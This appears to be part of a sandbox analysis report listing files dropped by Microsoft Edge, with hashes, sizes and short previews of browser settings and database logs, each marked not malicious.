                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\02a76340-38b7-4a96-8fab-63dfc8841c90.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):28366
                                                                                                                                                                                                                                                                  Entropy (8bit):5.558198046809236
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:Zzcjww7pLGLhDaWPPzf3u8F1+UoAYDCx9Tuqh0VfUC9xbog/OVlM2l4rw5NpFtuL:Zzcjw8chDaWPPzf3uu1jaEBlp5ptI
                                                                                                                                                                                                                                                                  MD5:B1A3D3FCAA4B2295C253E0A940EAFEFB
                                                                                                                                                                                                                                                                  SHA1:7172C37921C563B04CED14C5404E56DE62082A30
                                                                                                                                                                                                                                                                  SHA-256:F0BF7D33E57CBD6B4A27A89E111E7571D028EC205D59C411F762F20D3D1B6B76
                                                                                                                                                                                                                                                                  SHA-512:3E18648B05551E5E07222440D8611805A740B0AE5D5A1A55CE6E1F527A20FD6162420693D4314C6FE715E2644EE154B1CCCC0E1ACE567BE11D1F62883E949A84
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085859262848","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085859262848","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1911988d-e7d9-4674-8bcd-67b88dd1dbe5.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4dcd9553-4236-42c6-a57d-5a62fbd60097.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):12574
                                                                                                                                                                                                                                                                  Entropy (8bit):5.191584233069262
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stmFJ99QTryDioowbatSuyAs9FsZihUkn3h82bV+FiA66WvOyaFIMY8P5YJ:stmFPGouSuZs9FfhPbGix6WvOyaTYb
                                                                                                                                                                                                                                                                  MD5:2C30B2F1F24B66E00C1427D3A6263939
                                                                                                                                                                                                                                                                  SHA1:FC2E8DCEACCC2FCCFB6E9C1733D0B60DAA1578BD
                                                                                                                                                                                                                                                                  SHA-256:04FC5B97925B3A5E8DCF982014E9083BAFF06E1654B58CBA56913879CB60D6C2
                                                                                                                                                                                                                                                                  SHA-512:F9946942E017C69F7A0C143CD7BEBA73643BAFF0919B0B8B164D476B92A20D9D8CDD5D3B2A8D76F23D4E6EEF0674BDA04AB2F750591D36241F82AB4721AC0585
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085859980716","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5333aaf3-dbe8-40e4-9c3e-76953b1141e8.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13332
                                                                                                                                                                                                                                                                  Entropy (8bit):5.265656068705945
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stmFJ99QTryDioowbatSuyAs9FsZihaU6kn3h82bV+FiA66W5O9laFIMY8P5YJ:stmFPGouSuZs9Ffha8bGix6W5O9laTYb
                                                                                                                                                                                                                                                                  MD5:3BD6862617D11FAD0BF31A863C7C6E30
                                                                                                                                                                                                                                                                  SHA1:98725C60C52BE3B5C8A4D8A2C2A83D6BFDB1000B
                                                                                                                                                                                                                                                                  SHA-256:E7123D490AFD115F6150ED0D0C2373D9FD1E66478C3C1802F603D670CEEF64F4
                                                                                                                                                                                                                                                                  SHA-512:ED148B827CA7F6D525674461F487BC08191D8A976E5078EB3B65B3BD932EC788FB2B0F1B3CCB40BE42CFB65AAE40FC7A4DA1804A92ED9B1306A3491E4AD977E5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085859980716","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5a272459-c816-4970-ac81-2336a63356fa.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):38627
                                                                                                                                                                                                                                                                  Entropy (8bit):5.554833836570714
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:ZmKj2w7pLGLhgaWPPzfiu8F1+UoAYDCx9Tuqh0VfUC9xbog/OVyM2K4rwVYjXqKR:ZmKj28chgaWPPzfiuu1jaHBKpVYjastj
                                                                                                                                                                                                                                                                  MD5:8A1E9F8D56C6E0E4377346DB718F30E6
                                                                                                                                                                                                                                                                  SHA1:E5740D1341C2ABE238472E9713E9955DF29DD375
                                                                                                                                                                                                                                                                  SHA-256:236EF83EB49C19516DCA1B3A1A9670E8EAA6FE2104EB7B66FD6156A300DCB53A
                                                                                                                                                                                                                                                                  SHA-512:D51B685272F4E7104135572B0861FD796453AEACB1B07843379403CF347C60694CB70B3C7237EC947656EE43989B1C3D8336C4909393452EBF3E3AB16C1760BF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085859262848","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085859262848","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\78fe0b88-9a7c-467c-afad-bc5fdd5a2011.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7fe34ad1-5c07-43af-95fb-c59cbfcf014a.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13332
                                                                                                                                                                                                                                                                  Entropy (8bit):5.265612377751437
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:stmFPGouSuZs9Ffha8bGix6W8MO9laTYb:ssOoVuQFfvbGix+aTYb
                                                                                                                                                                                                                                                                  MD5:B58BD7403DA34730589C17E1D46E82FE
                                                                                                                                                                                                                                                                  SHA1:B887C922283A34CFE3596478C8D17C22DA702268
                                                                                                                                                                                                                                                                  SHA-256:748593F6E7FDA82D12792C6D708BBF1C4641AF49AB7FCDDFEAB1D8787E677FAA
                                                                                                                                                                                                                                                                  SHA-512:BB886F66F32D126429F86C96E015CE1F944565715C8F0471F11FE1B7B1AE90BA97E015E57378EABEB6145EEB295755DE5C77E0AF70DB01DD0295ACA5EDEDFB6F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085859980716","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8e2d7e1f-7a18-4af4-8eb0-724f99be814a.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40470
                                                                                                                                                                                                                                                                  Entropy (8bit):5.561181600973824
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:ZmKj2w7pLGLhgaWPPzfiu8F1+UoAYDCx9Tuqh0VfUC9xbog/OVthLM2K4rwVYjsC:ZmKj28chgaWPPzfiuu1jashLBKpVYj1/
                                                                                                                                                                                                                                                                  MD5:501F38429758CA757C65ABE8E96F55C2
                                                                                                                                                                                                                                                                  SHA1:4D4781B8B4271236072F42DD87C1F142236667B6
                                                                                                                                                                                                                                                                  SHA-256:7C9B84BC80B91509F1C45284FBC969ABF6A6FB8AE2B0705137690CAC76ECDFF2
                                                                                                                                                                                                                                                                  SHA-512:71A9715BD5584083801B9902F0EA52CD941D28A59F89F1B83A0F9EC24CB3BE6C29107FB1CA3A56A22320F08744B7921A6359265507AE966DE8DE67D560AA6B6E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085859262848","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085859262848","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                  Entropy (8bit):5.213347778217982
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oP/os1923oH+Tcwtp3hBtB2KLlpoPH1yq2P923oH+Tcwtp3hBWsIFUv:7ioBYebp3dFLTCyv4Yebp3eFUv
                                                                                                                                                                                                                                                                  MD5:CE485219D5D4699B103395020BA47923
                                                                                                                                                                                                                                                                  SHA1:04EB22584F92A4114D3D83456C816C5EB98FD320
                                                                                                                                                                                                                                                                  SHA-256:EB1C7E938BA371C149133D6EB27BBA77E7043F15B77638479E201AF6DB3D87B6
                                                                                                                                                                                                                                                                  SHA-512:1F3E6A06847B32B3C91373F4C3216DA46F4FB3D62343BEFC5DBC28C48A33E300C42BB4C973718A13905827E8102BFC651C565EA981733DD15CEFCDCD984D0B05
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.946 20a0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/19-07:44:25.028 20a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):2163821
                                                                                                                                                                                                                                                                  Entropy (8bit):5.222888268028366
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24576:v+/PN8FrfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN85fx2mjF
                                                                                                                                                                                                                                                                  MD5:A2E2094BAF649B0BBA898B24B0B88A52
                                                                                                                                                                                                                                                                  SHA1:ED6342DF5FC04D05DC5B8F9CD6C08A66BCB2D30E
                                                                                                                                                                                                                                                                  SHA-256:40C47473EC422CDA47040A2C15A7D955CAF001B395384E8FC87FD326E970B83D
                                                                                                                                                                                                                                                                  SHA-512:2CF66CBE456ABAFA964747ECB0F7FA6E8516B33DDA868C418D188F9C3DC34AE30D02B2A080CEAEFEC2F3B55A4C9BF82DB7DAE33F003C5A699DDA81D8D92561A0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                  Entropy (8bit):5.128972798407966
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPEc/Vq2P923oH+Tcwt9Eh1tIFUt8OoPMVgZmw+OoPrFIkwO923oH+Tcwt9Eh1H:7Iv4Yeb9Eh16FUt8OQ/+OT5LYeb9Eh1H
                                                                                                                                                                                                                                                                  MD5:73173260C16F2A6E4D2232F9C00465C4
                                                                                                                                                                                                                                                                  SHA1:2194ED5E2E8B8AE58513C432F14E266477E5A24C
                                                                                                                                                                                                                                                                  SHA-256:AA4DB7D584F783F381EB25F2C684517CB8162DCB7B19E00C29C5D5DDD920156E
                                                                                                                                                                                                                                                                  SHA-512:BF87614F2AF267ADE02ED7D308936FB6E09D2CF5DFA680EED23C7064C213DFE67142C5224BFB1A272864068830A4AC6B82573AEEE129B099E6D18A4AC5A11143
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.449 2274 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/19-07:44:23.451 2274 Recovering log #3.2024/12/19-07:44:23.456 2274 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                  Entropy (8bit):5.128972798407966
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPEc/Vq2P923oH+Tcwt9Eh1tIFUt8OoPMVgZmw+OoPrFIkwO923oH+Tcwt9Eh1H:7Iv4Yeb9Eh16FUt8OQ/+OT5LYeb9Eh1H
                                                                                                                                                                                                                                                                  MD5:73173260C16F2A6E4D2232F9C00465C4
